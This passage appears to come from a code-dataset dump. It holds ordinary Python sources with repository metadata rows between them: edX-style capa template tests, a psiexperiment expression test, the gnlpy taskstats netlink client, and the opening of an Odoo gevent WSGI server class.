{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': []},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': ['2']},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': ['2', '3']}]
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml,
"//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml,
"//label[@class='choicegroup_correct']",
self.context)
def test_problem_marked_unsubmitted(self):
"""
Test all conditions under which the entire problem
(not a particular option) is marked unanswered.
"""
conditions = [
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': ''},
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': []},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': []},
{'input_type': 'radio', 'value': ''},
{'input_type': 'radio', 'value': []},
{'input_type': 'checkbox', 'value': []},
{'input_type': 'checkbox', 'value': ['1']},
{'input_type': 'checkbox', 'value': ['1', '2']}]
self.context['status'] = Status('unanswered')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status unanswered']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml,
"//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml,
"//label[@class='choicegroup_correct']",
self.context)
def test_option_marked_correct(self):
"""
Test conditions under which a particular option
(not the entire problem) is marked correct.
"""
conditions = [
{'input_type': 'radio', 'question_label': '', 'value': '2'},
{'input_type': 'radio', 'question_label': '', 'value': ['2']}]
self.context['status'] = Status('correct')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//label[@class='choicegroup_correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_option_marked_incorrect(self):
"""
Test conditions under which a particular option
(not the entire problem) is marked incorrect.
"""
conditions = [
{'input_type': 'radio', 'value': '2'},
{'input_type': 'radio', 'value': ['2']}]
self.context['status'] = Status('incorrect')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//label[@class='choicegroup_incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_never_show_correctness(self):
"""
Test conditions under which we tell the template to
NOT show correct/incorrect, but instead show a message.
This is used, for example, by the Justice course to ask
questions without specifying a correct answer. When
the student responds, the problem displays "Thank you
for your response"
"""
conditions = [
{'input_type': 'radio', 'status': Status('correct'), 'question_label': '', 'value': ''},
{'input_type': 'radio', 'status': Status('correct'), 'question_label': '', 'value': '2'},
{'input_type': 'radio', 'status': Status('correct'), 'question_label': '', 'value': ['2']},
{'input_type': 'radio', 'status': Status('incorrect'), 'question_label': '', 'value': '2'},
{'input_type': 'radio', 'status': Status('incorrect'), 'question_label': '', 'value': []},
{'input_type': 'radio', 'status': Status('incorrect'), 'question_label': '', 'value': ['2']},
{'input_type': 'checkbox', 'status': Status('correct'), 'question_label': '', 'value': []},
{'input_type': 'checkbox', 'status': Status('correct'), 'question_label': '', 'value': ['2']},
{'input_type': 'checkbox', 'status': Status('incorrect'), 'question_label': '', 'value': []},
{'input_type': 'checkbox', 'status': Status('incorrect'), 'question_label': '', 'value': ['2']}]
self.context['show_correctness'] = 'never'
self.context['submitted_message'] = 'Test message'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
# Should NOT mark the entire problem correct/incorrect
xpath = "//div[@class='indicator_container']/span[@class='status correct']"
self.assert_no_xpath(xml, xpath, self.context)
xpath = "//div[@class='indicator_container']/span[@class='status incorrect']"
self.assert_no_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml,
"//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml,
"//label[@class='choicegroup_correct']",
self.context)
# Expect to see the message
self.assert_has_text(xml, "//div[@class='capa_alert']",
self.context['submitted_message'])
def test_no_message_before_submission(self):
"""
Ensure that we don't show the `submitted_message`
before submitting.
"""
conditions = [
{'input_type': 'radio', 'status': Status('unsubmitted'), 'question_label': '', 'value': ''},
{'input_type': 'radio', 'status': Status('unsubmitted'), 'question_label': '', 'value': []},
{'input_type': 'checkbox', 'status': Status('unsubmitted'), 'question_label': '', 'value': []},
# These tests expose bug #365
# When the bug is fixed, uncomment these cases.
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': '2'},
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': ['2']},
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': '2'},
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': ['2']},
#{'input_type': 'checkbox', 'status': 'unsubmitted', 'value': ['2']},
#{'input_type': 'checkbox', 'status': 'unsubmitted', 'value': ['2']}]
]
self.context['show_correctness'] = 'never'
self.context['submitted_message'] = 'Test message'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
# Expect that we do NOT see the message yet
self.assert_no_xpath(xml, "//div[@class='capa_alert']", self.context)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//fieldset/legend"
self.assert_has_text(xml, xpath, self.context['question_label'])
class TextlineTemplateTest(TemplateTestCase):
"""
Test mako template for `<textline>` input.
"""
TEMPLATE_NAME = 'textline.html'
def setUp(self):
self.context = {'id': '1',
'status': Status('correct'),
'label': 'test',
'value': '3',
'preprocessor': None,
'trailing_text': None}
super(TextlineTemplateTest, self).setUp()
def test_section_class(self):
cases = [({}, ' capa_inputtype textline'),
({'do_math': True}, 'text-input-dynamath capa_inputtype textline'),
({'inline': True}, ' capa_inputtype inline textline'),
({'do_math': True, 'inline': True}, 'text-input-dynamath capa_inputtype inline textline'), ]
for (context, css_class) in cases:
base_context = self.context.copy()
base_context.update(context)
xml = self.render_to_xml(base_context)
xpath = "//div[@class='%s']" % css_class
self.assert_has_xpath(xml, xpath, self.context)
def test_status(self):
cases = [('correct', 'correct', 'correct'),
('unsubmitted', 'unanswered', 'unanswered'),
('incorrect', 'incorrect', 'incorrect'),
('incomplete', 'incorrect', 'incomplete')]
for (context_status, div_class, status_mark) in cases:
self.context['status'] = Status(context_status)
xml = self.render_to_xml(self.context)
# Expect that we get a <div> with correct class
xpath = "//div[@class='%s ']" % div_class
self.assert_has_xpath(xml, xpath, self.context)
# Expect that we get a <p> with class="status"
# (used to by CSS to draw the green check / red x)
self.assert_has_text(xml, "//p[@class='status']",
status_mark, exact=False)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//input[@aria-label='%s']" % self.context['label']
self.assert_has_xpath(xml, xpath, self.context)
def test_hidden(self):
self.context['hidden'] = True
xml = self.render_to_xml(self.context)
xpath = "//div[@style='display:none;']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//input[@style='display:none;']"
self.assert_has_xpath(xml, xpath, self.context)
def test_do_math(self):
self.context['do_math'] = True
xml = self.render_to_xml(self.context)
xpath = "//input[@class='math']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//div[@class='equation']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//textarea[@id='input_1_dynamath']"
self.assert_has_xpath(xml, xpath, self.context)
def test_size(self):
self.context['size'] = '20'
xml = self.render_to_xml(self.context)
xpath = "//input[@size='20']"
self.assert_has_xpath(xml, xpath, self.context)
def test_preprocessor(self):
self.context['preprocessor'] = {'class_name': 'test_class',
'script_src': 'test_script'}
xml = self.render_to_xml(self.context)
xpath = "//div[contains(@class, 'text-input-dynamath_data') and @data-preprocessor='test_class']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//div[@class='script_placeholder' and @data-src='test_script']"
self.assert_has_xpath(xml, xpath, self.context)
def test_do_inline_and_preprocessor(self):
self.context['preprocessor'] = {'class_name': 'test_class',
'script_src': 'test_script'}
self.context['inline'] = True
xml = self.render_to_xml(self.context)
xpath = "//div[contains(@class, 'text-input-dynamath_data inline') and @data-preprocessor='test_class']"
self.assert_has_xpath(xml, xpath, self.context)
def test_do_inline(self):
cases = [('correct', 'correct'),
('unsubmitted', 'unanswered'),
('incorrect', 'incorrect'),
('incomplete', 'incorrect')]
self.context['inline'] = True
for (context_status, div_class) in cases:
self.context['status'] = Status(context_status)
xml = self.render_to_xml(self.context)
# Expect that we get a <div> with correct class
xpath = "//div[@class='%s inline']" % div_class
self.assert_has_xpath(xml, xpath, self.context)
def test_message(self):
self.context['msg'] = "Test message"
xml = self.render_to_xml(self.context)
xpath = "//span[@class='message']"
self.assert_has_text(xml, xpath, self.context['msg'])
class FormulaEquationInputTemplateTest(TemplateTestCase):
"""
Test make template for `<formulaequationinput>`s.
"""
TEMPLATE_NAME = 'formulaequationinput.html'
def setUp(self):
self.context = {
'id': 2,
'value': 'PREFILLED_VALUE',
'status': Status('unsubmitted'),
'label': 'test',
'previewer': 'file.js',
'reported_status': 'REPORTED_STATUS',
}
super(FormulaEquationInputTemplateTest, self).setUp()
def test_no_size(self):
xml = self.render_to_xml(self.context)
self.assert_no_xpath(xml, "//input[@size]", self.context)
def test_size(self):
self.context['size'] = '40'
xml = self.render_to_xml(self.context)
self.assert_has_xpath(xml, "//input[@size='40']", self.context)
class AnnotationInputTemplateTest(TemplateTestCase):
"""
Test mako template for `<annotationinput>` input.
"""
TEMPLATE_NAME = 'annotationinput.html'
def setUp(self):
self.context = {'id': 2,
'value': '<p>Test value</p>',
'title': '<h1>This is a title</h1>',
'text': '<p><b>This</b> is a test.</p>',
'comment': '<p>This is a test comment</p>',
'comment_prompt': '<p>This is a test comment prompt</p>',
'comment_value': '<p>This is the value of a test comment</p>',
'tag_prompt': '<p>This is a tag prompt</p>',
'options': [],
'has_options_value': False,
'debug': False,
'status': Status('unsubmitted'),
'return_to_annotation': False,
'msg': '<p>This is a test message</p>', }
super(AnnotationInputTemplateTest, self).setUp()
def test_return_to_annotation(self):
"""
Test link for `Return to Annotation` appears if and only if
the flag is set.
"""
xpath = "//a[@class='annotation-return']"
# If return_to_annotation set, then show the link
self.context['return_to_annotation'] = True
xml = self.render_to_xml(self.context)
self.assert_has_xpath(xml, xpath, self.context)
# Otherwise, do not show the links
self.context['return_to_annotation'] = False
xml = self.render_to_xml(self.context)
self.assert_no_xpath(xml, xpath, self.context)
def test_option_selection(self):
"""
Test that selected options are selected.
"""
# Create options 0-4 and select option 2
self.context['options_value'] = [2]
self.context['options'] = [
{'id': id_num,
'choice': 'correct',
'description': '<p>Unescaped <b>HTML {0}</b></p>'.format(id_num)}
for id_num in range(0, 5)]
xml = self.render_to_xml(self.context)
# Expect that each option description is visible
# with unescaped HTML.
# Since the HTML is unescaped, we can traverse the XML tree
for id_num in range(0, 5):
xpath = "//span[@data-id='{0}']/p/b".format(id_num)
self.assert_has_text(xml, xpath, 'HTML {0}'.format(id_num), exact=False)
# Expect that the correct option is selected
xpath = "//span[contains(@class,'selected')]/p/b"
self.assert_has_text(xml, xpath, 'HTML 2', exact=False)
def test_submission_status(self):
"""
Test that the submission status displays correctly.
"""
# Test cases of `(input_status, expected_css_class)` tuples
test_cases = [('unsubmitted', 'unanswered'),
('incomplete', 'incorrect'),
('incorrect', 'incorrect')]
for (input_status, expected_css_class) in test_cases:
self.context['status'] = Status(input_status)
xml = self.render_to_xml(self.context)
xpath = "//span[@class='status {0}']".format(expected_css_class)
self.assert_has_xpath(xml, xpath, self.context)
# If individual options are being marked, then expect
# just the option to be marked incorrect, not the whole problem
self.context['has_options_value'] = True
self.context['status'] = Status('incorrect')
xpath = "//span[@class='incorrect']"
xml = self.render_to_xml(self.context)
self.assert_no_xpath(xml, xpath, self.context)
def test_display_html_comment(self):
"""
Test that HTML comment and comment prompt render.
"""
self.context['comment'] = "<p>Unescaped <b>comment HTML</b></p>"
self.context['comment_prompt'] = "<p>Prompt <b>prompt HTML</b></p>"
self.context['text'] = "<p>Unescaped <b>text</b></p>"
xml = self.render_to_xml(self.context)
# Because the HTML is unescaped, we should be able to
# descend to the <b> tag
xpath = "//div[@class='block']/p/b"
self.assert_has_text(xml, xpath, 'prompt HTML')
xpath = "//div[@class='block block-comment']/p/b"
self.assert_has_text(xml, xpath, 'comment HTML')
xpath = "//div[@class='block block-highlight']/p/b"
self.assert_has_text(xml, xpath, 'text')
def test_display_html_tag_prompt(self):
"""
Test that HTML tag prompts render.
"""
self.context['tag_prompt'] = "<p>Unescaped <b>HTML</b></p>"
xml = self.render_to_xml(self.context)
# Because the HTML is unescaped, we should be able to
# descend to the <b> tag
xpath = "//div[@class='block']/p/b"
self.assert_has_text(xml, xpath, 'HTML')
class MathStringTemplateTest(TemplateTestCase):
"""
Test mako template for `<mathstring>` input.
"""
TEMPLATE_NAME = 'mathstring.html'
def setUp(self):
self.context = {'isinline': False, 'mathstr': '', 'tail': ''}
super(MathStringTemplateTest, self).setUp()
def test_math_string_inline(self):
self.context['isinline'] = True
self.context['mathstr'] = 'y = ax^2 + bx + c'
xml = self.render_to_xml(self.context)
xpath = "//section[@class='math-string']/span[1]"
self.assert_has_text(xml, xpath,
'[mathjaxinline]y = ax^2 + bx + c[/mathjaxinline]')
def test_math_string_not_inline(self):
self.context['isinline'] = False
self.context['mathstr'] = 'y = ax^2 + bx + c'
xml = self.render_to_xml(self.context)
xpath = "//section[@class='math-string']/span[1]"
self.assert_has_text(xml, xpath,
'[mathjax]y = ax^2 + bx + c[/mathjax]')
def test_tail_html(self):
self.context['tail'] = "<p>This is some <b>tail</b> <em>HTML</em></p>"
xml = self.render_to_xml(self.context)
# HTML from `tail` should NOT be escaped.
# We should be able to traverse it as part of the XML tree
xpath = "//section[@class='math-string']/span[2]/p/b"
self.assert_has_text(xml, xpath, 'tail')
xpath = "//section[@class='math-string']/span[2]/p/em"
self.assert_has_text(xml, xpath, 'HTML')
class OptionInputTemplateTest(TemplateTestCase):
"""
Test mako template for `<optioninput>` input.
"""
TEMPLATE_NAME = 'optioninput.html'
def setUp(self):
self.context = {
'id': 2,
'options': [],
'status': Status('unsubmitted'),
'label': 'test',
'value': 0
}
super(OptionInputTemplateTest, self).setUp()
def test_select_options(self):
# Create options 0-4, and select option 2
self.context['options'] = [(id_num, '<b>Option {0}</b>'.format(id_num))
for id_num in range(0, 5)]
self.context['value'] = 2
xml = self.render_to_xml(self.context)
# Should have a dummy default
xpath = "//option[@value='option_2_dummy_default']"
self.assert_has_xpath(xml, xpath, self.context)
# Should have each of the options, with the correct description
# The description HTML should NOT be escaped
# (that's why we descend into the <b> tag)
for id_num in range(0, 5):
xpath = "//option[@value='{0}']/b".format(id_num)
self.assert_has_text(xml, xpath, 'Option {0}'.format(id_num))
# Should have the correct option selected
xpath = "//option[@selected='true']/b"
self.assert_has_text(xml, xpath, 'Option 2')
def test_status(self):
# Test cases, where each tuple represents
# `(input_status, expected_css_class)`
test_cases = [('unsubmitted', 'status unanswered'),
('correct', 'status correct'),
('incorrect', 'status incorrect'),
('incomplete', 'status incorrect')]
for (input_status, expected_css_class) in test_cases:
self.context['status'] = Status(input_status)
xml = self.render_to_xml(self.context)
xpath = "//span[@class='{0}']".format(expected_css_class)
self.assert_has_xpath(xml, xpath, self.context)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//select[@aria-label='%s']" % self.context['label']
self.assert_has_xpath(xml, xpath, self.context)
class DragAndDropTemplateTest(TemplateTestCase):
"""
Test mako template for `<draganddropinput>` input.
"""
TEMPLATE_NAME = 'drag_and_drop_input.html'
def setUp(self):
self.context = {'id': 2,
'drag_and_drop_json': '',
'value': 0,
'status': Status('unsubmitted'),
'msg': ''}
super(DragAndDropTemplateTest, self).setUp()
def test_status(self):
# Test cases, where each tuple represents
# `(input_status, expected_css_class, expected_text)`
test_cases = [('unsubmitted', 'unanswered', 'unanswered'),
('correct', 'correct', 'correct'),
('incorrect', 'incorrect', 'incorrect'),
('incomplete', 'incorrect', 'incomplete')]
for (input_status, expected_css_class, expected_text) in test_cases:
self.context['status'] = Status(input_status)
xml = self.render_to_xml(self.context)
# Expect a <div> with the status
xpath = "//div[@class='{0}']".format(expected_css_class)
self.assert_has_xpath(xml, xpath, self.context)
# Expect a <p> with the status
xpath = "//p[@class='status']"
self.assert_has_text(xml, xpath, expected_text, exact=False)
def test_drag_and_drop_json_html(self):
json_with_html = json.dumps({'test': '<p>Unescaped <b>HTML</b></p>'})
self.context['drag_and_drop_json'] = json_with_html
xml = self.render_to_xml(self.context)
# Assert that the JSON-encoded string was inserted without
# escaping the HTML. We should be able to traverse the XML tree.
xpath = "//div[@class='drag_and_drop_problem_json']/p/b"
self.assert_has_text(xml, xpath, 'HTML')
class ChoiceTextGroupTemplateTest(TemplateTestCase):
"""Test mako template for `<choicetextgroup>` input"""
TEMPLATE_NAME = 'choicetext.html'
VALUE_DICT = {'1_choiceinput_0bc': '1_choiceinput_0bc', '1_choiceinput_0_textinput_0': '0',
'1_choiceinput_1_textinput_0': '0'}
EMPTY_DICT = {'1_choiceinput_0_textinput_0': '',
'1_choiceinput_1_textinput_0': ''}
BOTH_CHOICE_CHECKBOX = {'1_choiceinput_0bc': 'choiceinput_0',
'1_choiceinput_1bc': 'choiceinput_1',
'1_choiceinput_0_textinput_0': '0',
'1_choiceinput_1_textinput_0': '0'}
WRONG_CHOICE_CHECKBOX = {'1_choiceinput_1bc': 'choiceinput_1',
'1_choiceinput_0_textinput_0': '0',
'1_choiceinput_1_textinput_0': '0'}
def setUp(self):
choices = [
(
'1_choiceinput_0bc',
[
{'tail_text': '', 'type': 'text', 'value': '', 'contents': ''},
{'tail_text': '', 'type': 'textinput', 'value': '', 'contents': 'choiceinput_0_textinput_0'},
]
),
(
'1_choiceinput_1bc',
[
{'tail_text': '', 'type': 'text', 'value': '', 'contents': ''},
{'tail_text': '', 'type': 'textinput', 'value': '', 'contents': 'choiceinput_1_textinput_0'},
]
)
]
self.context = {
'id': '1',
'choices': choices,
'status': Status('correct'),
'input_type': 'radio',
'label': 'choicetext label',
'value': self.VALUE_DICT,
}
super(ChoiceTextGroupTemplateTest, self).setUp()
def test_grouping_tag(self):
"""
Tests whether we are using a section or a label to wrap choice elements.
Section is used for checkbox, so inputting text does not deselect
"""
input_tags = ('radio', 'checkbox')
self.context['status'] = Status('correct')
xpath = "//section[@id='forinput1_choiceinput_0bc']"
self.context['value'] = {}
for input_type in input_tags:
self.context['input_type'] = input_type
xml = self.render_to_xml(self.context)
self.assert_has_xpath(xml, xpath, self.context)
def test_problem_marked_correct(self):
"""Test conditions under which the entire problem
(not a particular option) is marked correct"""
self.context['status'] = Status('correct')
self.context['input_type'] = 'checkbox'
self.context['value'] = self.VALUE_DICT
# Should mark the entire problem correct
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml, "//label[@class='choicetextgroup_incorrect']",
self.context)
self.assert_no_xpath(xml, "//label[@class='choicetextgroup_correct']",
self.context)
def test_problem_marked_incorrect(self):
"""Test all conditions under which the entire problem
(not a particular option) is marked incorrect"""
grouping_tags = {'radio': 'label', 'checkbox': 'section'}
conditions = [
{'status': Status('incorrect'), 'input_type': 'radio', 'value': {}},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': self.WRONG_CHOICE_CHECKBOX},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': self.BOTH_CHOICE_CHECKBOX},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': self.VALUE_DICT},
{'status': Status('incomplete'), 'input_type': 'radio', 'value': {}},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': self.WRONG_CHOICE_CHECKBOX},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': self.BOTH_CHOICE_CHECKBOX},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': self.VALUE_DICT}]
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
grouping_tag = grouping_tags[test_conditions['input_type']]
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_incorrect']".format(grouping_tag),
self.context)
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_correct']".format(grouping_tag),
self.context)
def test_problem_marked_unsubmitted(self):
"""Test all conditions under which the entire problem
(not a particular option) is marked unanswered"""
grouping_tags = {'radio': 'label', 'checkbox': 'section'}
conditions = [
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': {}},
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': self.EMPTY_DICT},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': {}},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': self.EMPTY_DICT},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': self.VALUE_DICT},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': self.BOTH_CHOICE_CHECKBOX},
]
self.context['status'] = Status('unanswered')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status unanswered']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
grouping_tag = grouping_tags[test_conditions['input_type']]
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_incorrect']".format(grouping_tag),
self.context)
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_correct']".format(grouping_tag),
self.context)
def test_option_marked_correct(self):
"""Test conditions under which a particular option
(not the entire problem) is marked correct."""
conditions = [
{'input_type': 'radio', 'question_label': '', 'value': self.VALUE_DICT}]
self.context['status'] = 'correct'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//section[@id='forinput1_choiceinput_0bc' and\
@class='choicetextgroup_correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_option_marked_incorrect(self):
"""Test conditions under which a particular option
(not the entire problem) is marked incorrect."""
conditions = [
{'input_type': 'radio', 'question_label': '', 'value': self.VALUE_DICT}]
self.context['status'] = 'incorrect'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//section[@id='forinput1_choiceinput_0bc' and\
@class='choicetextgroup_incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//fieldset[@aria-label='%s']" % self.context['label']
self.assert_has_xpath(xml, xpath, self.context)
|
agpl-3.0
| -6,188,294,893,259,739,000 | 39.686983 | 113 | 0.551708 | false |
bburan/psiexperiment
|
tests/test_expression.py
|
1
|
3838
|
import pytest
import unittest
import numpy as np
from atom.api import Atom, Bool
from psi.context.expression import Expr, ExpressionNamespace
class TestExpression(unittest.TestCase):
def test_eval(self):
context = dict(a=1, b=2, c=3)
test_cases = [
('1+2', 3),
('b*c', 6),
('1+c', 4)
]
for expr, expected in test_cases:
actual = Expr(expr).evaluate(context)
self.assertEqual(actual, expected)
def test_symtable(self):
expr = Expr('randint(10)')
expr.evaluate(dict(randint=np.random.randint))
expr = Expr('np.random.randint(x)')
expr.evaluate(dict(x=5, np=np))
class TestExpressionNamespace(unittest.TestCase):
EXPRESSIONS = {
'd': '10',
'a': '10*5',
'b': 'a+1',
'c': 'b*a',
'e': 'd*2',
'f': 'd*bar',
'g': 'random.randint(b)',
}
def test_evaluation(self):
ns = ExpressionNamespace(self.EXPRESSIONS)
self.assertEqual(ns.get_value('c'), 2550)
self.assertEqual(ns.get_value('e'), 20)
self.assertEqual(ns.get_value('d'), 10)
self.assertEqual(ns.get_value('f', {'bar': 1.5}), 15)
def test_evaluation_override(self):
ns = ExpressionNamespace(self.EXPRESSIONS)
self.assertEqual(ns.get_value('c', {'a': 2}), 6)
self.assertEqual(ns.get_value('a', {'a': 2}), 2)
def test_cache(self):
# We know for this particular seed that second and third call to the
# generator will not return the same value.
random = np.random.RandomState(seed=1)
ns = ExpressionNamespace(self.EXPRESSIONS, {'random': random})
initial = ns.get_value('g')
self.assertEqual(initial, ns.get_value('g'))
self.assertEqual(initial, ns.get_value('g'))
ns.reset()
self.assertNotEqual(initial, ns.get_value('g'))
def test_extra_context(self):
random = np.random.RandomState(seed=1)
ns = ExpressionNamespace(self.EXPRESSIONS, {'random': random})
ns.set_values({'bar': 3.1})
ns.set_value('z', 32)
values = ns.get_values()
self.assertTrue('z' in values)
self.assertTrue('bar' in values)
self.assertEqual(values['z'], 32)
self.assertEqual(values['f'], 31)
class ANT(Atom):
observed = Bool()
def __init__(self, *args, **kwargs):
super(ANT, self).__init__(*args, **kwargs)
def mark_observed(self, event):
self.observed = True
@pytest.mark.skip(reason='disabled notification for value change ' \
'since this produced high overhead')
class TestAtomNotification(unittest.TestCase):
def setUp(self):
expressions = {
'a': Expr('2'),
'b': Expr('a*10'),
}
self.ant = ANT()
self.ns = ExpressionNamespace(expressions)
self.ns.observe('_locals', self.ant.mark_observed)
def test_get_value_notification(self):
for v in ('a', 'b'):
self.ant.observed = False
self.ns.get_value(v)
self.assertTrue(self.ant.observed)
def test_set_value_notification(self):
self.ant.observed = False
self.ns.set_value('c', 5)
self.assertTrue(self.ant.observed)
def test_get_value_notification_no_change(self):
self.ant.observed = False
self.ns.get_value('b')
self.assertTrue(self.ant.observed)
# Should not trigger notification because 'a' was already computed when
# getting 'b', so there was no change in value.
self.ant.observed = False
self.ns.get_value('a')
self.assertFalse(self.ant.observed)
|
mit
| -7,155,792,216,147,302,000 | 29.459016 | 79 | 0.563835 | false |
nuclon/gnlpy
|
taskstats.py
|
1
|
3337
|
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
"""Taskstats module
This module exists to expose the taskstats api to python
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# @lint-avoid-python-3-compatibility-imports
# from __future__ import unicode_literals
import struct
import gnlpy.netlink as netlink
# These are attr_list_types which are nestable. The command attribute list
# is ultimately referenced by the messages which are passed down to the
# kernel via netlink. These structures must match the type and ordering
# that the kernel expects.
class Taskstats(object):
__fields__ = [
'version', 'exitcode', 'flag', 'nice', 'cpu_count',
'cpu_delay_total', 'blkio_count', 'blkio_delay_total',
'swapin_count', 'swapin_delay_total',
'cpu_run_real_total', 'cpu_run_virtual_total', 'comm',
'sched', 'uid', 'gid', 'pid', 'ppid', 'btime', 'etime',
'utime', 'stime', 'minflt', 'majflt', 'coremem',
'virtmem', 'hiwater_rss', 'hiwater_vm', 'read_char',
'write_char', 'read_syscalls', 'write_syscalls',
'read_bytes', 'write_bytes', 'cancelled_write_bytes',
'nvcsw', 'nivcsw', 'utimescaled', 'stimescaled',
'cpu_scaled_run_real_total', 'freepages_count',
'freepages_delay_total'
]
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __repr__(self):
arr = ['%s=%s' % (f, repr(self.__dict__[f])) for f in self.__fields__]
return 'TaskStats(%s)' % ', '.join(arr)
@staticmethod
def unpack(val):
fmt = 'HIBBQQQQQQQQ32sQxxxIIIIIQQQQQQQQQQQQQQQQQQQQQQQ'
attrs = dict(zip(Taskstats.__fields__, struct.unpack(fmt, val)))
assert attrs['version'] == 8, "Bad version: %d" % attrs["version"]
attrs['comm'] = attrs['comm'].rstrip('\0')
return Taskstats(**attrs)
TaskstatsType = netlink.create_attr_list_type(
'TaskstatsType',
('PID', netlink.U32Type),
('TGID', netlink.U32Type),
('STATS', Taskstats),
('AGGR_PID', netlink.RecursiveSelf),
('AGGR_TGID', netlink.RecursiveSelf),
('NULL', netlink.IgnoreType),
)
TaskstatsAttrList = netlink.create_attr_list_type(
'TaskstatsAttrList',
('PID', netlink.U32Type),
('TGID', netlink.U32Type),
('REGISTER_CPUMASK', netlink.IgnoreType),
('DEREGISTER_CPUMASK', netlink.IgnoreType),
)
TaskstatsMessage = netlink.create_genl_message_type(
'TaskstatsMessage', 'TASKSTATS',
('GET', TaskstatsAttrList),
('NEW', TaskstatsType),
required_modules=[],
)
class TaskstatsClient(object):
"""A python client to interact with taskstats
"""
def __init__(self, verbose=False):
self.verbose = verbose
self.nlsock = netlink.NetlinkSocket()
def get_pid_stats(self, pid):
replies = self.nlsock.query(TaskstatsMessage(
'GET', flags=netlink.MessageFlags.ACK_REQUEST,
attr_list=TaskstatsAttrList(pid=pid)
))
return replies[0].get_attr_list().get('aggr_pid').get('stats')
|
bsd-3-clause
| 2,638,740,090,719,133,000 | 32.707071 | 78 | 0.64519 | false |
adaptivdesign/odooku-compat
|
odooku/services/wsgi/server.py
|
1
|
1636
|
from gevent.wsgi import WSGIServer as BaseWSGIServer
from werkzeug.debug import DebuggedApplication
from werkzeug.contrib.fixers import ProxyFix
import odoo.http
from odoo.service.wsgi_server import application_unproxied as odoo_application
from odoo.tools import config
import logging
import greenlet
import gevent
_logger = logging.getLogger(__name__)
class WSGIServer(BaseWSGIServer):
def __init__(self, port, interface='0.0.0.0', max_accept=None,
timeout=25, proxy_mode=False, rules=None, newrelic_agent=None,
**kwargs):
self.max_accept = max_accept or config['db_maxconn']
self.timeout = timeout
